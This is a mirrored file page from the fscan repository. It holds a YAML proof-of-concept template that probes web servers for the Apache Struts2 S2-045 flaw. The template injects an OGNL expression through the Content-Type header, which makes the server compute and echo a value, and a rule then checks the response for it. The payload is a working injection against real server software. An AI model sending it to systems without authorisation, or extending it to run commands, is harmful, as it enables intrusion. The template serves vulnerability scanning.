mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-16 14:22:36 +08:00
16 lines
483 B
YAML
16 lines
483 B
YAML
name: poc-yaml-struts2_045-1
|
|
set:
|
|
r1: randomInt(800, 1000)
|
|
r2: randomInt(800, 1000)
|
|
rules:
|
|
- method: GET
|
|
path: /
|
|
headers:
|
|
Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
|
|
follow_redirects: true
|
|
expression: |
|
|
"Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
|
|
detail:
|
|
author: shadown1ng(https://github.com/shadown1ng)
|
|
|